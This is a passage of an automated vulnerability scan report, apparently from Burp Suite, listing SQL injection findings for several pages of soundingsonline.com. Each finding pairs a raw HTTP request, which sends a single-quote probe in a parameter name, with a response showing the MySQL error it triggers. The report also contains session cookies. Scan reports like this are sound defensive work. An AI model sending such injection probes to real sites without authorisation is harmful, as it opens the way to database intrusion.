
Request 1

GET /news/coastwise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/coastwise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.185. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/dispatches?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/dispatches?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.186. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/home-waters?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/home-waters?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.187. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.188. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/sailing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/sailing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.189. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/todays-top-stories?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/todays-top-stories?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.190. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /resources?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.191. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /site-map?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /site-map?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.192. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
